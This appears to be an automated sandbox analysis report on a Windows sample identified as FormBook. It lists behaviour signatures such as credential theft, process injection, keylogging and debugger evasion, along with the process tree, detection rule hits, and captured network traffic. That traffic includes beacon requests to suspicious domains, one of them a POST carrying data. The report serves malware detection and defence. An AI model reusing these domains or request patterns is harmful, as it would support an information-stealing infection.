Windows Analysis Report
fFoOcuxK7M.exe

Overview

General Information

Sample name: fFoOcuxK7M.exe (renamed because original name is a hash value)
Original sample name: 048a70dd4178e419339f012d993772ada047ca8222cae372e716e41e2a43545c.exe
Analysis ID: 1588135
MD5: 72fc342138f06b0dfd4c6bdd3edd676d
SHA1: dfd756902a23521df608df3f809d71971059970b
SHA256: 048a70dd4178e419339f012d993772ada047ca8222cae372e716e41e2a43545c
Tags: exe, Formbook, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious RASdial Activity
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • fFoOcuxK7M.exe (PID: 5392 cmdline: "C:\Users\user\Desktop\fFoOcuxK7M.exe" MD5: 72FC342138F06B0DFD4C6BDD3EDD676D)
    • svchost.exe (PID: 5740 cmdline: "C:\Users\user\Desktop\fFoOcuxK7M.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • TrOCMVbhcDRPP.exe (PID: 2360 cmdline: "C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • rasdial.exe (PID: 5376 cmdline: "C:\Windows\SysWOW64\rasdial.exe" MD5: A280B0F42A83064C41CFFDC1CD35136E)
          • TrOCMVbhcDRPP.exe (PID: 3524 cmdline: "C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1224 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000007.00000002.3384177581.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2455586677.0000000003560000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.3385458090.0000000002D30000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000009.00000002.3387326168.0000000005100000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2455105837.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

                System Summary

                Source: Process started
                Author: juju4
                Data: Command: "C:\Windows\SysWOW64\rasdial.exe", CommandLine: "C:\Windows\SysWOW64\rasdial.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rasdial.exe, NewProcessName: C:\Windows\SysWOW64\rasdial.exe, OriginalFileName: C:\Windows\SysWOW64\rasdial.exe, ParentCommandLine: "C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe" , ParentImage: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe, ParentProcessId: 2360, ParentProcessName: TrOCMVbhcDRPP.exe, ProcessCommandLine: "C:\Windows\SysWOW64\rasdial.exe", ProcessId: 5376, ProcessName: rasdial.exe

                Source: Process started
                Author: Florian Roth (Nextron Systems)
                Data: Command: "C:\Users\user\Desktop\fFoOcuxK7M.exe", CommandLine: "C:\Users\user\Desktop\fFoOcuxK7M.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\fFoOcuxK7M.exe", ParentImage: C:\Users\user\Desktop\fFoOcuxK7M.exe, ParentProcessId: 5392, ParentProcessName: fFoOcuxK7M.exe, ProcessCommandLine: "C:\Users\user\Desktop\fFoOcuxK7M.exe", ProcessId: 5740, ProcessName: svchost.exe

                Source: Process started
                Author: vburov
                Data: Command: "C:\Users\user\Desktop\fFoOcuxK7M.exe", CommandLine: "C:\Users\user\Desktop\fFoOcuxK7M.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\fFoOcuxK7M.exe", ParentImage: C:\Users\user\Desktop\fFoOcuxK7M.exe, ParentProcessId: 5392, ParentProcessName: fFoOcuxK7M.exe, ProcessCommandLine: "C:\Users\user\Desktop\fFoOcuxK7M.exe", ProcessId: 5740, ProcessName: svchost.exe

                No Suricata rule has matched
                AV Detection

                Source: fFoOcuxK7M.exe | Virustotal: Detection: 60%
                Source: fFoOcuxK7M.exe | ReversingLabs: Detection: 78%
                Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000007.00000002.3384177581.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2455586677.0000000003560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3385458090.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.3387326168.0000000005100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2455105837.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3385516192.0000000003BF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3381605146.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2456155033.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                Source: fFoOcuxK7M.exe | Joe Sandbox ML: detected
                Source: fFoOcuxK7M.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: TrOCMVbhcDRPP.exe, 00000006.00000002.3381600573.0000000000D0E000.00000002.00000001.01000000.00000005.sdmp, TrOCMVbhcDRPP.exe, 00000009.00000000.2521933157.0000000000D0E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: fFoOcuxK7M.exe, 00000000.00000003.2160188894.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, fFoOcuxK7M.exe, 00000000.00000003.2159892716.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363585255.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2455649386.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2455649386.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2362029403.0000000003300000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000007.00000003.2457562839.0000000004718000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000007.00000002.3385957166.0000000004A5E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000007.00000003.2455394804.0000000004565000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000007.00000002.3385957166.00000000048C0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: rasdial.pdb source: svchost.exe, 00000002.00000002.2455363254.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2424289874.000000000301A000.00000004.00000020.00020000.00000000.sdmp, TrOCMVbhcDRPP.exe, 00000006.00000002.3385029170.00000000014B8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: fFoOcuxK7M.exe, 00000000.00000003.2160188894.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, fFoOcuxK7M.exe, 00000000.00000003.2159892716.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2363585255.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2455649386.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2455649386.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2362029403.0000000003300000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000007.00000003.2457562839.0000000004718000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000007.00000002.3385957166.0000000004A5E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000007.00000003.2455394804.0000000004565000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000007.00000002.3385957166.00000000048C0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: rasdial.pdbGCTL source: svchost.exe, 00000002.00000002.2455363254.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2424289874.000000000301A000.00000004.00000020.00020000.00000000.sdmp, TrOCMVbhcDRPP.exe, 00000006.00000002.3385029170.00000000014B8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: rasdial.exe, 00000007.00000002.3386629794.0000000004EEC000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3384731505.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, TrOCMVbhcDRPP.exe, 00000009.00000000.2522280502.0000000002CCC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2741446347.000000003FCBC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: rasdial.exe, 00000007.00000002.3386629794.0000000004EEC000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3384731505.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, TrOCMVbhcDRPP.exe, 00000009.00000000.2522280502.0000000002CCC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2741446347.000000003FCBC000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe | Code function: 0_2_0012445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0012445A
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe | Code function: 0_2_0012C6D1 FindFirstFileW,FindClose,0_2_0012C6D1
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe | Code function: 0_2_0012C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0012C75C
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe | Code function: 0_2_0012EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0012EF95
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe | Code function: 0_2_0012F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0012F0F2
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe | Code function: 0_2_0012F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0012F3F3
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe | Code function: 0_2_001237EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_001237EF
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe | Code function: 0_2_00123B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00123B12
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe | Code function: 0_2_0012BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0012BCBC

                Networking

                Source: DNS query: www.egldfi.xyz
                Source: Joe Sandbox View | IP Address: 130.185.109.77
                Source: Joe Sandbox View | IP Address: 13.248.169.48
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported 7 times)
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe | Code function: 0_2_001322EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_001322EE
                Source: global traffic | HTTP traffic detected: GET /vl4d/?jxk=HtO4sxDXWj2&grix=QHNq3VljPHXHL8Z9j/8QJFBBwlzGlceqr4baOeL+2A69zWcjzNULNYjIURgj3Svvwd9B+/BgHSW8C8HA7Jym3k9iw4Eb0W9eqh06xomc0IPDFwjqEVOXfa2YeBvnOQ4os/FobUM= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.75178.club | User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global traffic | HTTP traffic detected: GET /5onp/?grix=YQtAzQFhELh+NSSoDqDomWI7hzIl6D7m8iHa4W14s/j18xx0uDy8MYWH0B9/yw3XqDLZco6qWp6tHax8xys+VW2Tte7Ln6/KpqGbSDXjhArBxXysrtN2DmXd3Va6ONamRXh2vEM=&jxk=HtO4sxDXWj2 HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.bcg.services | User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global traffic | HTTP traffic detected: GET /bsyy/?grix=w9Wsyrfddra1GxcU+lvvJ4oQD8tz6DR/pSTnVJEXbHEmdfQx+6bPNdVPoslsCSigyUnMPNoyb3wBtIJwqnPVs1zZ2HmJ/p0t/zKv7OSTrBDtbJtNF3YKND91rSNX8lR/VDEldzg=&jxk=HtO4sxDXWj2 HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.43kdd.top | User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global traffic | HTTP traffic detected: GET /cv1w/?grix=KIRaABhBgujzn3KWmND9cpAT+69hyUlHf/kT3kOA8kciiH38vV9KVMyDNvMwVI643JmGXckFkIiptpvhjjDetXnoSoSOcAqJ+evnJHX5lUu5kxQtYxAyoUFY891atvjjNtDr6f0=&jxk=HtO4sxDXWj2 HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.lgdiamonds.info | User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global traffic | HTTP traffic detected: GET /lvda/?grix=ELDSXX2RsHX+gMhDzPeoz2Qv1CIr49o7uMJ0P3epR9C3wBGcH3Oc/iCy84j3rr0M4JJUpyIPXVKNA8OpCuWYnK4KGJgudRTv/NyY6RpnXIZyD5kBpznzTkEusFk7ThvsJGVoHcI=&jxk=HtO4sxDXWj2 HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.jalan2.online | User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global traffic | DNS traffic detected: DNS query: www.75178.club
                Source: global traffic | DNS traffic detected: DNS query: www.bcg.services
                Source: global traffic | DNS traffic detected: DNS query: www.egldfi.xyz
                Source: global traffic | DNS traffic detected: DNS query: www.betmatchx.online
                Source: global traffic | DNS traffic detected: DNS query: www.43kdd.top
                Source: global traffic | DNS traffic detected: DNS query: www.lgdiamonds.info
                Source: global traffic | DNS traffic detected: DNS query: www.jalan2.online
                Source: unknownHTTP traffic detected: POST /5onp/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cache-Control: no-cacheContent-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 209Host: www.bcg.servicesOrigin: http://www.bcg.servicesReferer: http://www.bcg.services/5onp/User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30Data Raw: 67 72 69 78 3d 56 53 46 67 77 6d 74 6e 46 6f 38 59 62 6a 65 49 4f 4d 75 31 77 6e 63 4a 34 52 35 49 2f 78 58 72 6d 79 44 44 38 54 41 2b 6a 65 57 76 38 68 56 50 68 33 76 48 45 64 2b 58 76 51 74 43 38 44 50 4c 6a 47 72 53 51 62 4c 33 54 4f 57 58 4a 34 39 6f 78 52 6b 54 64 53 48 2f 71 76 62 4f 68 73 7a 47 69 37 44 2f 62 42 54 68 79 6b 79 52 6c 6c 6d 62 37 76 78 61 44 55 72 70 74 68 65 4f 57 66 36 4d 52 58 39 7a 74 51 70 50 6f 41 69 36 53 7a 57 48 61 67 62 41 7a 6d 57 6f 6b 6c 6d 53 38 77 79 33 31 4f 31 34 4b 78 56 48 47 34 50 34 43 72 36 6f 46 79 43 66 6c 76 71 4a 58 70 6b 37 2b 42 33 75 4a 56 6f 6a 55 56 54 2b 48 35 5a 78 Data Ascii: grix=VSFgwmtnFo8YbjeIOMu1wncJ4R5I/xXrmyDD8TA+jeWv8hVPh3vHEd+XvQtC8DPLjGrSQbL3TOWXJ49oxRkTdSH/qvbOhszGi7D/bBThykyRllmb7vxaDUrptheOWf6MRX9ztQpPoAi6SzWHagbAzmWoklmS8wy31O14KxVHG4P4Cr6oFyCflvqJXpk7+B3uJVojUVT+H5Zx
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 20:47:28 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67811756-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 20:47:30 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67811756-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 20:47:33 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67811756-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 20:47:35 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67811756-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.2Date: Fri, 10 Jan 2025 20:47:41 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 83(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!2S>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.2Date: Fri, 10 Jan 2025 20:47:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 83(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!2S>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.2Date: Fri, 10 Jan 2025 20:47:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 83(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!2S>0
